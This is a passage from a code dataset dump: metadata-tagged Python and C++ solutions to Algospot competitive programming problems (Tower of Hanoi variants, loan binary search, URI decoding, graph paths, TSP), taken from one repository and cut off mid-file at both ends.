rl().split())\n locations = map(float, rl().split())\n diffs = [-1]*(M-1)\n for i in xrange(len(locations)-1):\n diffs[i] = locations[i+1] - locations[i]\n print \"{:.2f}\".format(round(solve(), 2))\n" }, { "alpha_fraction": 0.4065384566783905, "alphanum_fraction": 0.42923077940940857, "avg_line_length": 23.29906463623047, "blob_id": "a7707bf51b74d114ee0cbae9cc1cd1c46c74d384", "content_id": "39ea978fd5afb824be74e70e5a463e5dd7039b8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2600, "license_type": "no_license", "max_line_length": 72, "num_lines": 107, "path": "/HANOI4/HANOI4_Bit.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\ndef get(state, index):\n return (state >> (index * 2)) & 3\n\ndef set(state, index, value):\n return (state & ~(3<< (index * 2))) | (value << (index * 2))\n\ndef inc(n):\n if n > 0 :\n return n + 1\n elif n < 0:\n return n - 1\n else:\n return 0\n\ndef set_list(state, index_list, value):\n ret = state\n for i in index_list:\n ret = set(ret, i, value)\n return ret\n\nd = dict()\ndef precalc(disk_num):\n print 'hello'\n end = 0\n for i in xrange(1,disk_num+1):\n end = set(end, i, 3)\n\n d[end] = 0\n\n q = collections.deque()\n q.append(end)\n\n while q :\n parent = q.popleft()\n top = [-1,-1,-1,-1]\n for n in xrange(disk_num+1,0,-1):\n top[get(parent, n)] = n\n\n for i in xrange(4):\n if top[i] != -1:\n for j in xrange(4):\n if i != j and (top[j] == -1 or top[j] > top[i]):\n child = set(parent, top[i], j)\n if not child in d:\n d[child] = d[parent] + 1\n q.append(child)\n\n\ndef solve(disk_num, state):\n end = 0\n for i in xrange(1,disk_num+1):\n end = set(end, i, 3)\n\n if end == state:\n return 0\n\n c = dict()\n\n c[end] = -1\n c[state] = 1\n\n q = collections.deque()\n q.append(state)\n q.append(end)\n\n while q :\n parent = q.popleft()\n top = [-1,-1,-1,-1]\n for n in xrange(disk_num+1,0,-1):\n top[get(parent, n)] = n\n\n for i in xrange(4):\n if top[i] != -1:\n for j in xrange(4):\n if i != j and (top[j] == -1 or top[j] > top[i]):\n child = set(parent, top[i], j)\n if not child in c:\n c[child] = inc(c[parent])\n q.append(child)\n else:\n if c[child] * c[parent] < 0:\n return abs(c[child]) + abs(c[parent]) -1\n return -1\n\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\n')\n for _ in xrange(int(rl())):\n disk_num = int(rl())\n state = 0\n for i in xrange(4):\n state = set_list(state, map(int, rl().split()[1:]), i)\n print solve(disk_num, state)\n\n # For random test\n # import random\n # n = 10\n #\n # for _ in xrange(2):\n # state = 0\n # for i in xrange(1,n+1):\n # state = set(state,i,random.randrange(0,4))\n # print solve(n, state)\n" }, { "alpha_fraction": 0.5714285969734192, "alphanum_fraction": 0.5864661931991577, "avg_line_length": 21.16666603088379, "blob_id": "4e13163c1337678a400943f9d86184a6839bb2ef", "content_id": "5a7fff2ecff27ecf0645f8e35720f632186d8795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "no_license", "max_line_length": 54, "num_lines": 6, "path": "/HELLOWORLD/HELLOWORLD.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nrl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n\nfor _ in xrange(int(rl())):\n print \"Hello, {0}!\".format(rl())\n" }, { "alpha_fraction": 0.37823835015296936, "alphanum_fraction": 0.462435245513916, "avg_line_length": 24.733333587646484, "blob_id": "7363527387cafb3c8970d890478eabdbe57ed06e", "content_id": "a74ae788ba0353df1477f97e480983ef1fe7b6e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 772, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/LOAN/LOAN.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef pay_all_debt(N, M, P, month_pay):\n for i in xrange(M):\n # print N, 1+1.0*P/100\n N *= (1+1.0*P/12/100)\n N -= month_pay\n if N <= 0:\n break\n return N<=0\n\ndef solve(N, M, P):\n lo, hi = 0.0, 10.0**8\n while hi -lo > 10**-8:\n mid = (lo+hi)/2\n if pay_all_debt(N,M,P, mid):\n hi = mid\n else:\n lo = mid\n\n return mid\n\nif __name__ == \"__main__\":\n # print \"{:0.10f}\".format(solve(20000000, 12, 6.8))\n # print pay_all_debt(20000000, 12, 6.8, 2343750.0)\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n N, M, P = rl().split()\n N, M, P = float(N), int(M), float(P)\n print \"{:0.10f}\".format(solve(N, M, P))\n" }, { "alpha_fraction": 0.2742980420589447, "alphanum_fraction": 0.31317493319511414, "avg_line_length": 26.235294342041016, "blob_id": "520346ca2544e1ad2472843b1bbb729c20e7de11", "content_id": "9a3c2fe17b126d45cb57587d3a6c798677363452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 75, "num_lines": 17, "path": "/URI/URI.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = {'%24':'$','%25':'%','%20':' ','%21':'!','%28':'(','%29':')','%2a':'*'}\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n uri = rl()\n ret = \"\"\n i = 0\n while i < len(uri):\n if uri[i] == \"%\":\n ret += d[uri[i:i+3]]\n i += 3\n else:\n ret += uri[i]\n i += 1\n print ret\n" }, { "alpha_fraction": 0.4265129566192627, "alphanum_fraction": 0.4495677351951599, "avg_line_length": 23.785715103149414, "blob_id": "bb86541cd9c5fc7f7644252d3e6f78770d1fd7f2", "content_id": "e099da5620af99a72c60bb95db11babcc44d6eaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 50, "num_lines": 14, "path": "/ANAGRAM/ANAGRAM.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n str1, str2 = rl().split()\n if str1 == str2 or len(str1) != len(str2):\n print(\"No.\")\n continue\n\n if sorted(str1) == sorted(str2):\n print(\"Yes\")\n else:\n print(\"No.\")\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5659722089767456, "avg_line_length": 16, "blob_id": "c7e9a1025294ad140d4960f80383bc2a2f6288fc", "content_id": "ab31b5e8183ddd5787ebafc46ef3e1d21bfcfb7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 288, "license_type": "no_license", "max_line_length": 53, "num_lines": 17, "path": "/WILDCARD/WILDCARD.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport fnmatch\n\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\tfor _ in xrange(int(rl())):\n\t\tw = rl()\n\t\tnames = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\tnames.append(rl())\n\n\t\tret = fnmatch.filter(names, w)\n\t\tret.sort()\n\n\t\tfor i in ret:\n\t\t\tprint i" }, { "alpha_fraction": 0.5248227119445801, "alphanum_fraction": 0.5531914830207825, "avg_line_length": 22.5, "blob_id": "6e50bf5399285a909d061a8e5db0afe95a9a8b8a", "content_id": "567e90c4caecd03a1827ea5cfbff42047a44b2de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 141, "license_type": "no_license", "max_line_length": 61, "num_lines": 6, "path": "/ENCRYPT/ENCRYPT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nrl = lambda:sys.stdin.readline().rstrip().rstrip(' \\t\\r\\n\\0')\nfor _ in xrange(int(rl())):\n s = rl()\n print(s[::2]+s[1::2])\n" }, { "alpha_fraction": 0.6705882549285889, "alphanum_fraction": 0.6705882549285889, "avg_line_length": 20.25, "blob_id": "9c8156147857ac9c99fb3a495cc2d83b198c4ede", "content_id": "add399d0d0537a0453b5fadb36788587afb15484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/MERCY/MERCY.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nfor _ in xrange(int(sys.stdin.readline())):\n print('Hello Algospot!')\n" }, { "alpha_fraction": 0.5126582384109497, "alphanum_fraction": 0.5379746556282043, "avg_line_length": 23.947368621826172, "blob_id": "bf63bf09e7138857e866b18156688e7bdb5c01f6", "content_id": "3d4547d23451ea54ffd780a9ddd266a86d91fb26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 75, "num_lines": 19, "path": "/STARCRAFT/STARCRAFT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom math import factorial\n\ndef solve(p, k):\n combination = lambda n, k: factorial(n) / (factorial(n-k)*factorial(k))\n p = 1.0*p/100\n all_win = p**k\n\n ret = all_win\n for i in xrange(1,k):\n ret += combination(k+(i-1),i) * (1.0 - p)**i * all_win\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n p, k = map(int, rl().split())\n print(int(round(solve(p, k)*100)))\n" }, { "alpha_fraction": 0.46973365545272827, "alphanum_fraction": 0.47699758410453796, "avg_line_length": 17.772727966308594, "blob_id": "5b2663eb1329c163e89b0c747bac456ceb936032", "content_id": "c11cf09a1a40b50202792f1ef8457f0a71d3e5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/STRJOIN/STRJOIN.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom heapq import *\n\ndef solve(l):\n ret = 0\n q = sorted(l)\n \n while len(q) > 1:\n a = heappop(q)\n b = heappop(q)\n ret += a+b\n heappush(q,a+b)\n\n return ret\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n rl()\n str_list = map(int, rl().split())\n print solve(str_list)\n" }, { "alpha_fraction": 0.5752032399177551, "alphanum_fraction": 0.5975610017776489, "avg_line_length": 21.409090042114258, "blob_id": "d981ab211d1d96278f7e136544b4c3bf2013189d", "content_id": "c08f549fb74786098e63412a0eee4b95526f6a90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 62, "num_lines": 22, "path": "/TRIANGLEPATH/TRIANGLEPATH.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nclass TrianglePath():\n\t@staticmethod\n\tdef solve(triangle):\n\t\tn = len(triangle)\n\t\tfor i in xrange(n-1,-1,-1):\n\t\t\tfor j in xrange(n-1,-1,-1):\n\t\t\t\tif i < j:\n\t\t\t\t\ttriangle[j-1][i] += max(triangle[j][i], triangle[j][i+1])\n\n\t\treturn triangle[0][0]\n\nif __name__ == \"__main__\":\n\trl = lambda: sys.stdin.readline().rstrip('\\t\\r\\n\\0')\n\n\tfor _ in xrange(int(rl())):\n\t\ttriangle = []\n\t\tfor _ in xrange(int(rl())):\n\t\t\ttriangle.append(map(int, rl().split()))\n\n\t\tprint TrianglePath.solve(triangle)" }, { "alpha_fraction": 0.4559228718280792, "alphanum_fraction": 0.47566574811935425, "avg_line_length": 25.240962982177734, "blob_id": "fd20d7bdc67c1b6c1a438a438ddba40d72db684c", "content_id": "e4bc998a2701c02d564f88c53cd318c7dd6f0c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2178, "license_type": "no_license", "max_line_length": 79, "num_lines": 83, "path": "/TPATH/TPATH_dict.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import defaultdict\n# import gc\ngraph = defaultdict(list)\n\ndef dfs1(n, start, min_v, max_v):\n if start == n-1:\n graph[start][start] = min(graph[start][start], max_v-min_v)\n return\n\n graph[start][start] = 1\n for i in xrange(n):\n if start == i:\n continue\n # Visited Node\n if n-1 != i and graph[i][i] != -1:\n continue\n\n if graph[start][i] >= 0:\n if min_v == -1:\n dfs(n, i, graph[start][i], graph[start][i])\n else:\n dfs(n,i,min(min_v,graph[start][i]), max(max_v,graph[start][i]))\n\n graph[start][start] = -1\n\ndef solve1(n, m):\n dfs(n, 0, -1, -1)\n return graph[n-1][n-1]\n\ndef dfs2(n, start, min_v, max_v, visited):\n if start == n-1:\n return True\n\n # Check visited\n visited[start] = True\n\n for v2, cost in graph[start]:\n # Visit not visted adjacent node\n if not visited[v2] and min_v <= cost <= max_v:\n if dfs2(n, v2, min_v, max_v, visited):\n visited[start] = False\n return True\n visited[start] = False\n return False\n\ndef solve2(n, m, orders):\n lo, hi, ret = 0, 0, sys.maxint\n while True:\n visited = [False]*n\n if dfs2(n, 0, orders[lo], orders[hi], visited):\n ret = min(ret, orders[hi]-orders[lo])\n lo += 1\n else:\n if hi == len(orders)-1:\n break\n hi += 1\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n # gc.collect()\n n, m = map(int, rl().split())\n if m == 1:\n rl()\n print 0\n continue\n\n # for i in xrange(n):\n # for j in xrange(n):\n # graph[i][j] = -1\n\n orders = set()\n for i in xrange(m):\n v1, v2, cost = map(int, rl().split())\n graph[v1].append((v2,cost))\n graph[v2].append((v1,cost))\n # graph[v1][v2] = cost\n # graph[v2][v1] = cost\n orders.add(cost)\n\n print solve2(n, m, sorted(list(orders)))\n" }, { "alpha_fraction": 0.4326923191547394, "alphanum_fraction": 0.49038460850715637, "avg_line_length": 23, "blob_id": "6b8239201550c736915a56698b66361d4c3b7a2b", "content_id": "9fa032b1d3bb5d7bd5acc55696181d8c5ca3b756", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 624, "license_type": "no_license", "max_line_length": 47, "num_lines": 26, "path": "/SNAIL/SNAIL.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ncache = None\ndef precalc():\n global cache\n cache = [[0]*i for i in xrange(1,1002)]\n cache[1][0] = 0.75\n cache[1][1] = 0.25\n for i in xrange(1000):\n for j in xrange(i+1):\n cache[i+1][j] += cache[i][j]*0.75\n for j in xrange(i+1):\n cache[i+1][j+1] += cache[i][j]*0.25\n\ndef solve(n, m):\n ret = 0\n for i in xrange(2*m-n+1):\n ret += cache[m][i]\n return ret\n\nif __name__ == \"__main__\":\n precalc()\n rl = lambda: sys.stdin.readline()\n for _ in xrange(int(rl())):\n n, m = map(int, rl().split())\n print \"{:.10f}\".format(solve(n, m))\n" }, { "alpha_fraction": 0.41016462445259094, "alphanum_fraction": 0.42591267824172974, "avg_line_length": 23.508771896362305, "blob_id": "09b86ded84902d7c0c804fa9c545e7fc8a46de40", "content_id": "87059bf8267f67e266a66a45a764c2dc9f639075", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1397, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/HANOI4/HANOI4.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\n# Move i -> j\n\ndef move2tuple(tup, i, j):\n l = list(tup)\n l[j] = tup[j] + (tup[i][-1],)\n l[i] = tup[i][:len(tup[i])-1]\n return tuple(l)\n\ndef inc(n):\n if n > 0 :\n return n + 1\n elif n < 0:\n return n - 1\n else:\n return 0\n\ndef solve(disk_num, state):\n end = (),(),(),tuple([i for i in xrange(disk_num,0,-1 )])\n if end == state:\n return 0\n\n c = dict()\n c[end] = -1\n c[state] = 1\n\n q = collections.deque()\n q.append(state)\n\n while q :\n parent = q.popleft()\n for i in xrange(4):\n if parent[i]:\n for j in xrange(4):\n if i != j and (not parent[j] or parent[j][-1] > parent[i][-1]):\n child = move2tuple(parent, i, j)\n if not child in c:\n c[child] = inc(c[parent])\n q.append(child)\n else:\n if c[child] * c[parent] < 0:\n return abs(c[child]) + abs(c[parent]) -1\n\n return c[end]\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip('\\n')\n for _ in xrange(int(rl())):\n disk_num = int(rl())\n state = ()\n for i in xrange(4):\n state += tuple(map(int, rl().split())[1:]),\n\n print solve(disk_num, state)\n" }, { "alpha_fraction": 0.41853034496307373, "alphanum_fraction": 0.43130990862846375, "avg_line_length": 23.076923370361328, "blob_id": "f338c658650517545557ce7f91c32156cfba4f35", "content_id": "ce8cb768461c2968a7d3c6e005c0a296d247fe0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/FIX/FIX.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n rl()\n ret = 0\n input = map(int, rl().split())\n for i in xrange(len(input)):\n if (i+1) == input[i]:\n ret += 1\n\n print ret\n" }, { "alpha_fraction": 0.46335533261299133, "alphanum_fraction": 0.47690171003341675, "avg_line_length": 20.646615982055664, "blob_id": "365e190d3fcbac9d128c587772fa84bc1cd52ba5", "content_id": "90ecb7a85c540018c6e210f717fc36ce0548c97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2879, "license_type": "no_license", "max_line_length": 74, "num_lines": 133, "path": "/TPATH/TPATH.cpp", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <vector>\n#include <limits>\n#include <algorithm>\n#include <sstream>\n#include <cstring>\n\nusing namespace std;\n\n#define MAX 987654321\nint V, E;\n\n\nbool dfs(int start, vector<vector<pair<int, int> > > adj, \\\n int lo, int hi, vector<bool> visited){\n\n if(start == V-1)\n return true;\n\n visited[start] = true;\n for(int i = 0; i < adj[start].size(); i++){\n int v2 = adj[start][i].first;\n int cost = adj[start][i].second;\n if(!visited[v2] && lo <= cost && cost <= hi){\n if(dfs(v2, adj, lo, hi, visited)) {\n return true;\n }\n }\n }\n return false;\n}\n\nint solve(vector<vector<pair<int, int> > >adj, vector<int> order){\n int lo = 0;\n int hi = 0;\n int ret = MAX;\n\n while(true){\n vector<bool> visited(V, false);\n if(dfs(0, adj, order[lo], order[hi], visited)){\n ret = min(ret, order[hi]-order[lo]);\n lo++;\n }\n else{\n if(hi == order.size()-1){\n break;\n }\n hi++;\n }\n }\n return ret;\n}\n\n// Kruskal\nstruct DisjointSet {\n vector<int> parent, rank;\n\n DisjointSet(int n) : parent(n), rank(n, 1) {\n for(int i = 0; i < n; i++)\n parent[i] = i;\n }\n\n int find(int u) {\n if(u == parent[u])\n return u;\n return parent[u] = find(parent[u]);\n }\n\n void merge(int u, int v) {\n u = find(u); v = find(v);\n if(u == v)\n return;\n\n if(rank[u] > rank[v])\n swap(u, v);\n\n if(rank[u] == rank[v])\n rank[v]++;\n\n parent[u] = v;\n }\n};\n\n\nvector<pair<int, pair<int,int> > > order;\n\nint minUpperBound(int lo){\n DisjointSet sets(V);\n for(int i = 0; i < E; i++) {\n if(order[i].first < lo)\n continue;\n\n sets.merge(order[i].second.first, order[i].second.second);\n if(sets.find(0) == sets.find(V-1))\n return order[i].first;\n }\n\n return MAX;\n}\n\nint solve2(vector<vector<pair<int, int> > >adj) {\n int ret = MAX;\n for(int i = 0; i < E; i++){\n ret = min(ret, minUpperBound(order[i].first)-order[i].first);\n }\n return ret;\n}\n\nint main(){\n cin.sync_with_stdio(false);\n\n int T = 0;\n cin >> T;\n\n while(T--){\n cin >> V >> E;\n int v1,v2,cost;\n vector<vector<pair<int, int> > > adj(V);\n order.resize(E);\n for(int i= 0; i < E; i++){\n cin >> v1 >> v2 >> cost;\n adj[v1].push_back(make_pair(v2, cost));\n adj[v2].push_back(make_pair(v1, cost));\n // order.push_back(cost);\n order[i] = make_pair(cost, make_pair(v1, v2));\n }\n // order.erase( unique(order.begin(), order.end()), order.end() );\n sort(order.begin(), order.end());\n\n cout << solve2(adj) <<endl;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4161735773086548, "alphanum_fraction": 0.4299802780151367, "avg_line_length": 28.823530197143555, "blob_id": "98aef1d8940a1a0961ca8cd8bc2982404f4593c7", "content_id": "c9454fcedbd79df9cefd99e7a236bd2b2a6ae591", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/MAXSUM/MAXSUM.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n array = map(int, rl().split())\n cu_sum, max_value = 0, 0\n for i in xrange(n):\n cu_sum += array[i]\n if cu_sum < 0 and array[i] > 0:\n cu_sum = array[i]\n elif cu_sum < 0 and array[i] < 0:\n cu_sum = 0\n else:\n max_value = max(max_value, cu_sum)\n print max_value\n" }, { "alpha_fraction": 0.5108107924461365, "alphanum_fraction": 0.5189189314842224, "avg_line_length": 22.870967864990234, "blob_id": "2f959e06508121748b794ca7f375b86ea55406f9", "content_id": "3e65b83f8ab5a86da6be6b075c88ae9ef319cd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 58, "num_lines": 31, "path": "/NECKLACE/NECKLACE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef determine(n, c, c_numbers, value):\n cu_sum = 0\n for i in xrange(c):\n cu_sum += min(c_numbers[i], value)\n if cu_sum >= value*n:\n return True\n else:\n return False\n\ndef solve(n, c, c_numbers):\n max_bound = sum(c_numbers)+1\n min_bound = 0\n\n while min_bound + 1 < max_bound:\n mid = (max_bound+min_bound)/2\n if determine(n, c, c_numbers, mid):\n min_bound = mid\n else:\n max_bound = mid\n\n return min_bound\n\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n, c = map(int, rl().split())\n c_numbers = map(int, rl().split())\n print solve(n, c, c_numbers)\n" }, { "alpha_fraction": 0.49286314845085144, "alphanum_fraction": 0.512174665927887, "avg_line_length": 23.306121826171875, "blob_id": "a69e9b22a84e580a233bf403353fadeee2bdf66c", "content_id": "f183b6d376a1195b29bfd89bff096e65f71558cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 58, "num_lines": 49, "path": "/NUMBERGAME/NUMBERGAME.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nboard = None\ncache = None\nn = 0\nMAX = 987654321\n\ndef dp(left, right):\n if not cache[left][right] is None:\n return cache[left][right]\n\n if left == right:\n cache[left][right] = board[left]\n return cache[left][right]\n elif (right - left) == 1:\n if board[left] > board[right]:\n diff = board[left] - board[right]\n else:\n diff = board[right] - board[left]\n\n cache[left][right] = diff\n return cache[left][right]\n else:\n # 4 cases\n ret = -MAX\n # Delete left 2\n ret = max(ret, -dp(left+2, right))\n # Delete right 2\n ret = max(ret, -dp(left, right-2))\n # Gain left 1\n ret = max(ret, board[left] - dp(left+1, right))\n # Gain right 1\n ret = max(ret, board[right] - dp(left, right-1))\n\n cache[left][right] = ret\n return cache[left][right]\n\n\n\ndef solve():\n return dp(0, n-1)\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n cache = [[None]*n for _ in xrange(n)]\n board = map(int, rl().split())\n print solve()\n" }, { "alpha_fraction": 0.39347079396247864, "alphanum_fraction": 0.40549829602241516, "avg_line_length": 21.384614944458008, "blob_id": "c39fd7ddf63010bb7e867fd00bfbdd736de1fe68", "content_id": "6046d632ba8524df44c6903bd9f2ffb4e9fe60de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 582, "license_type": "no_license", "max_line_length": 52, "num_lines": 26, "path": "/MATCHORDER/MATCHORDER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n\n for _ in xrange(int(rl())):\n rl()\n russia = map( int, rl().split())\n korea = map(int, rl().split())\n\n russia = sorted(russia,reverse=True)\n korea = sorted(korea,reverse=True)\n i, j, win = 0, 0, 0\n\n while True:\n if i == len(russia) or j == len(korea):\n break\n\n if russia[i] <= korea[j]:\n i+=1\n j+=1\n win += 1\n else:\n i+=1\n\n print win\n" }, { "alpha_fraction": 0.4920969307422638, "alphanum_fraction": 0.5100105404853821, "avg_line_length": 26.114286422729492, "blob_id": "f0f6cb5e3f8d55a0fa2aa0200e7d126b4a2ee27a", "content_id": "33e839b33dbdd9bde46b5a782d2885ee6c5e96a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 949, "license_type": "no_license", "max_line_length": 73, "num_lines": 35, "path": "/PICNIC/PICNIC.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\n\ngraph = None\ndef count_couples(n, visited):\n # Visit all friends\n if visited == (1<<n)-1:\n return 1\n\n ret = 0\n start = -1\n # Select next seed\n for i in xrange(n):\n if not (visited & (1<<i)):\n start = i\n break\n\n # Recursive call this function with couple(start, not visited friend)\n for i in xrange(start+1, n):\n if not (visited & (1<<i)):\n if graph[start][i]:\n ret += count_couples(n, visited+(1<<start)+(1<<i))\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n, m = map(int, rl().split())\n graph = [[False]*n for _ in xrange(n)]\n friends = map(int, rl().split())\n for i in xrange(0,m*2,2):\n graph[friends[i]][friends[i+1]] = True\n graph[friends[i+1]][friends[i]] = True\n print count_couples(n, 0)\n" }, { "alpha_fraction": 0.38771185278892517, "alphanum_fraction": 0.42266950011253357, "avg_line_length": 29.45161247253418, "blob_id": "ab3737fcb76b8029f61fc3dab1b195ca1206bf8c", "content_id": "6bab4ddc24f5c9d8806745728c32beaff490437e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 944, "license_type": "no_license", "max_line_length": 61, "num_lines": 31, "path": "/WEEKLYCALENDAR/WEEKLYCALENDAR.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nweek_day = ['Sunday', 'Monday', 'Tuesday', 'Wednesday',\\\n 'Thursday', 'Friday', 'Saturday']\nnumber_day = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n m, d, s = rl().split()\n m = int(m)-1\n d = int(d)\n s = week_day.index(s)\n\n start = d - s\n ret = [\"\",]*7\n\n for i in xrange(7):\n # Count a day of previous month\n if start + i < 1:\n if m == 1:\n ret[i] = str(start + i + number_day[11])\n else:\n ret[i] = str(start + i + number_day[m-1])\n # Count a day of next month\n elif start + i > number_day[m]:\n ret[i] = str(start + i - number_day[m])\n else:\n ret[i] = str(start + i)\n\n print ' '.join(ret)\n" }, { "alpha_fraction": 0.40221402049064636, "alphanum_fraction": 0.4206642210483551, "avg_line_length": 21.58333396911621, "blob_id": "bbfb4e91a5f1e38f15269fc09323fc7ac0e3758c", "content_id": "97eaac65795044e7b6a324256e5be1e5d1572d3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "no_license", "max_line_length": 42, "num_lines": 12, "path": "/DRAWRECT/DRAWRECT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n x,y = 0,0\n for _ in xrange(3):\n input = map(int, rl().split())\n x ^= input[0]\n y ^= input[1]\n\n print x, y\n" }, { "alpha_fraction": 0.4858638644218445, "alphanum_fraction": 0.49738219380378723, "avg_line_length": 23.487178802490234, "blob_id": "186a61a1c3bc88eacae44bf48cca0396852a3c25", "content_id": "c6b37037f1006c893f5184103f0cebb202ea8a3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 955, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/TSP1/TSP1.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ngraph = None\ncache = None\n\ndef dp(n, here, visited):\n if cache[here][visited] >= 0:\n return cache[here][visited]\n\n cache[here][visited] = sys.maxint\n for nxt in xrange(n):\n if visited & (1<<nxt):\n continue\n if visited + (1<<nxt) == ((1 << n)-1):\n m = graph[here][nxt]\n else:\n m = graph[here][nxt]+ 